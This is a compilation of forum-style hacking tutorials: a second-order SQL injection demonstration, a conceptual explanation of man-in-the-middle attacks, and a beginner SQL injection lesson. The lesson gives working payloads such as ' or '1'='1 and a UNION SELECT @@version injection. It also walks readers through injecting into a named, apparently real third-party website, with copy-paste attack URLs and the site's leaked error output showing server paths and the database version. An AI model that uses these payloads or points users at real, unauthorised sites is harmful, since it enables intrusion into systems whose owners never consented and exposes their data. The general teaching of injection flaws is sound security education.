Second Order SQL Injection

Taken From: http://www.esecforte.com/our-blog/

I always thought that escaping single quotes in a string based user input used for database transactions will prevent SQL injections..but this is not always the case when single quotes are escaped inconsistently (as we will see in this blog).

Say hello to SQL injection of the second order !
Basically second order SQL injections take place when one functionality of a web application takes a user input from a user, escapes (not strips) all SQL metacharacters and inserts that data input into a database. Next, some other functionality of the same application uses that data to craft another SQL query to do a database transaction without escaping that data first (bad idea!). The database transaction done by the second functionality introduces a SQL injection bug in the web application known as second order SQL injection.

I have’nt heard of any second order SQL injection attacks on real world targets, so decided to make up an example attack myself. Following are the two functionalities with their respective codes (select.php and insert2.php).

 The first functionality inserts data into the database. The second functionality uses the data inserted into the fname column to craft a SQL query and get data from the database and show it on the frontend. For making it easy to understand, all the SQL queries run by the web applications are also shown on the frontend.

Lets do a basic walk through of the applications. First using insert2.php, our details are inserted as shown:-

As we can see from the second pair of examples, this application escapes any single quotes while inserting data into the database. Now, lets use select.php to get the inserted data.

This application also escapes the user input as shown, queries the database using that value. The fname value we get from the first query is used to run another query to get all the data about a user. We can see from select.php code that the second query does not escapes the fname value returned from the database and uses that value directly to get all data. This is the point of our second order SQL injection.

So to manipulate the second query of this application in a meaningful way, we will have to inject a SQL query in the first name field of insert2.php and make sure the query is correctly formed and then use select.php to trigger the vulnerable query. We open the application insert2.php and inject the value ” aaaa’ union select version(),2,3,’a ” in the first name field as shown:-

Now, we open select.php and insert the name “attack” and hit enter to get the following:-

Allright!! we were able to exploit the vulnerability to run an arbitrary query on the database. Similarly, we can use advanced SQLi to gain unauthorized access to the database.

The way that the application was vulnerable to second order SQLi is very unlikely in real world and this was only used to demonstrate the exploitation of this vulnerability. Hope the explanation was clear and everyone liked it 
Cheers!!

** Taken from: http://www.esecforte.com/our-blog/
 

Man In The Middle Attack

The man-in-the middle attack intercepts a communication between two systems. For example, in an http transaction the target is the TCP connection between client and server. Using different techniques, the attacker splits the original TCP connection into 2 new connections, one between the client and the attacker and the other between the attacker and the server, as shown in figure 1. Once the TCP connection is intercepted, the attacker acts as a proxy, being able to read, insert and modify the data in the intercepted communication.
** proxy - go to my session about Burp proxy.

MITM

The MITM attack is very effective because of the nature of the http protocol and data transfer which are all ASCII based. In this way, it’s possible to view and interview within the http protocol and also in the data transferred. So, for example, it’s possible to capture a session cookie reading the http header, but it’s also possible to change an amount of money transaction inside the application context, as shown in figure 2.

Request

The MITM attack could also be done over an https connection by using the same technique; the only difference consists in the establishment of two independent SSL sessions, one over each TCP connection. The browser sets a SSL connection with the attacker, and the attacker establishes another SSL connection with the web server. In general the browser warns the user that the digital certificate used is not valid, but the user may ignore the warning because he doesn’t understand the threat.

FireFox example

ff_mitm.png (64.68 KiB) Viewed 4 times

In some specific contexts it’s possible that the warning doesn’t appear, as for example, when the Server certificate is compromised by the attacker or when the attacker certificate is signed by a trusted CA and the CN is the same of the original web site.

MITM is not only an attack technique, but is also usually used during the development step of a web application or is still used for Web Vulnerability assessments.

SQL injection - Part 1

Last time we finished talking about the Web Proxy and it's features. 

We learned how to use some of the main functions, such as: Intercepting packets, Targeting them, Repeating requests and even use them for Brute Force attacks. 

Lesson #5 : SQL injection : Session No.1

Today we're gonna discuss the famous attack called SQL injection.

Well First, let's step into the code language itself and learn some basic phrases.

SQL (or Structured Query Language) is a programming language designed for managing data in relational database management systems (RDBMS).
Its scope includes data insert, query, update and delete, schema creation and modification, and data access control.

The SQL language is subdivided into several language elements, including:

+ Clauses, which are constituent components of statements and queries.
+ Expressions, which can produce either scalar values or tables consisting of columns and rows of data.
+ Predicates, which specify conditions that can be evaluated to SQL three-valued logic (3VL) or Boolean (true/false/unknown) truth values and which are used to limit the effects of statements and queries, or to change program flow.
+ Queries, which retrieve the data based on specific criteria. This is the most important element of SQL.
+ Statements, which may have a persistent effect on schemata and data, or which may control transactions, program flow, connections, sessions, or diagnostics.

O.k. after the boring part.. Let's jump into the Queries:

The most common operation in SQL is the query, which is performed with the declarative SELECT statement. SELECTretrieves data from one or more tables, or expressions. Standard SELECT statements have no persistent effects on the database.

Queries allow the user to describe desired data, leaving the database management system (DBMS) responsible for planning, optimizing, and performing the physical operations necessary to produce that result as it chooses.

+ The FROM clause which indicates the table(s) from which data is to be retrieved.
+ The WHERE clause includes a comparison predicate, which restricts the rows returned by the query. The WHEREclause eliminates all rows from the result set for which the comparison predicate does not evaluate to True.

And now... The example:   

This query returns a list of expensive books. * means "return all table's columns",
FROM [tableName], in our case - Book, WHERE the column named "price" has a raw that hold a value larger than 100.00, and when on the table please order the raws by the "title" column. 
------------------------------------------
SELECT *
FROM Book
WHERE price > 100.00
ORDER BY title;
------------------------------------------
So the answer can look like this:

Title++++++++++++++++++++++ Price ++++ Author
------------------------------------ ++ ------- +++ -------------------------
How to become a Hacker++++| 405.7 ++++| Ido.N
The Joy of Pink ++++++++++++| 132.99 +++| Pink Panther
An Introduction to nonsense+| 221.50 +++| Garfield
Pitfalls of Beer ++++++++++++| 102.00 +++| Homer Simpson

**If you want to see only the "Price" and "Title", all you need to do is SELECT the
right columns.
------------------------------------------
SELECT title, price
FROM Book
...
------------------------------------------

the following is hardly the basics, but you can continue reading here :
http://en.wikipedia.org/wiki/SQL

  So now let's talk a little about what exactly is an SQL injection.   

A SQL injection is often used to attack the security of a website by inputting SQL statements in a web form to get a badly designed website to perform operations on the database (often to dump the database content to the attacker) other than the usual operations as intended by the designer. 

SQL injection is a code injection technique that exploits a security vulnerability in a website's software. 
The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. 

SQL commands are thus injected from the web form into the database of an application (like queries) to change the database content or dump the database information like credit card or passwords to the attacker. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

This form of SQL injection occurs when user input is not filtered for escape characters and is then passed into an SQL statement. This results in the potential manipulation of the statements performed on the database by the end-user of the application

So now that we understood what is the attack we can dive in to the injection itself.
Let's look at a simple injection.

This is the developer side, or more common - Server side:

CODE: SELECT ALL

statement = "SELECT * FROM users WHERE name = ' " + userName + " ';"

Here we can see a parameter wich holds a stored procedure, this procedure is taking a value from an end-user in a parameter called "userName" and retrieving the value from the table "users".
After retrieving the user's name from the database, the web form opens a block with this name (if exists, else dropes an error).

If the "userName" variable is crafted in a specific way by a malicious user, the SQL statement may do more than the code author intended. For example, setting the "userName" variable as : 

CODE: SELECT ALL

' or '1'='1

renders the following SQL statement by the parent language:

CODE: SELECT ALL

SELECT * FROM users WHERE name = '' OR '1'='1';

this example could be used to force the selection of a valid username because the evaluation of '1'='1' is always true.
More than that simple query, there is a way to "break" the query like this:

CODE: SELECT ALL

' OR '1'='1' UNION SELECT @@version';

This kind of injection will retrieve two tables, one with the valid user and the second with the Database's version.
But they will be displayed toghether.

Here is a live example, please use it to view only!

http://www.istanbuleczaciodasi.org.tr/nobetler.php?t=b&bolgeID=1

This is a trashed Turkish website i've encountred a few months ago.
Let's try and inject something.. shell we 

http://www.istanbuleczaciodasi.org.tr/nobetler.php?t=b&bolgeID=1'

What happend?!?     

O.k. stay calm.. this is exactly what we wanted to accomplish.

Look at the error on the first raw:

CODE: SELECT ALL

Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near '\'. (severity 15) in /usr/local/www/ieowwwroot/nobetler.php on line 82

It says: 
+ Warning : means code will still run. (errors can crash the site, but warnings don't) 
+ mssql_query massage: the warning's details.
** those warning are the hacker's best friend, cause when i can tell you what you did wrong, you will know exactly what to change in order to make it work.

For examlpe:
----------------------------------------------------------------------------------------------------
your query:

http://www.someDomain.com/BFid=1' make breakfast;

breakfast_query_massage: 'there is no egg in the pan'

your next query:

http://www.someDomain.com/BFid=1' take out an agg from the fridge;....make breakfast;

breakfast_query_massage: 'omlet is ready'
----------------------------------------------------------------------------------------------------
+ where the warning has occured :
in /usr/local/www/ieowwwroot/nobetler.php on line 82

You can see the Path Disclosure wich counts as a vulnerability itself.
/usr/local/www/ - means the Server is Linux based.

/ieowwwroot/ is the directory wich the web service is at, and the page that 
commited the warning is "nobetter.php"

Now that we understood what went on, we can try to inject our self.

Copy and paste the next Url:

[url]http://www.istanbuleczaciodasi.org.tr/nobetler.php?t=b&bolgeID=1 or 1=1[/url]

Now investigate the differences between bolgeID=1 and bolgeID=1 or 1=1

You'll see that the first displays only 1 option, and the other displays all the options.. 
this is exactly what we implemented earlier in the example above (remember?  ).

This means there is an SQL injection attack at hand, and the database can answer queries we will inject in the parameter.
It seams like the query is:

CODE: SELECT ALL

statment = "SELECT * FROM [sometable] WHERE  ID = "' + bolgeID + '";

So as i told you before.. Let's try and "break" this query into retrieving data it shouldn't retrieve...   

Copy and paste the next Url:

http://www.istanbuleczaciodasi.org.tr/nobetler.php?t=b&bolgeID=@@version

Now you will see that the warning changed, and the injection succeded.

Let's watch the warning.

Warning: mssql_query() [function.mssql-query]: message: Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86) Jul 9 2008 14:43:34 Copyright (c) 1988-2008 Microsoft Corporation Enterprise Edition on Windows NT 5.2 <X86> (Build 3790: Service Pack 2, v.2825) ' to data type int. (severity 16) in /usr/local/www/ieowwwroot/nobetler.php on line 82

You can see that I inputed "@@version" into the parameter "bolgeID".
the following error returned:

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86) Jul 9 2008 14:43:34 Copyright (c) 1988-2008 Microsoft Corporation Enterprise Edition on Windows NT 5.2 <X86> (Build 3790: Service Pack 2, v.2825) ' to data type int

Means there was a problem converting my input to an input that this parameter suppose to get. --> "to data type int" (int means integer - Natural numbers).

also the query succeded to retrieve the version of the database:

'Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86) Jul 9 2008 14:43:34 Copyright (c) 1988-2008 Microsoft Corporation Enterprise Edition on Windows NT 5.2 <X86> (Build 3790: Service Pack 2, v.2825) '

There are a lot of injections that can be commited through this parameter.
I'll let you practice a little   

See ya next Session where we discuss the difference between certain databases, and dive even dipper in the queries.
Please download SQL express for next Session.  

Thank you for reading.
You're welcome to promote me with inboxing the uTest team.

Cheers,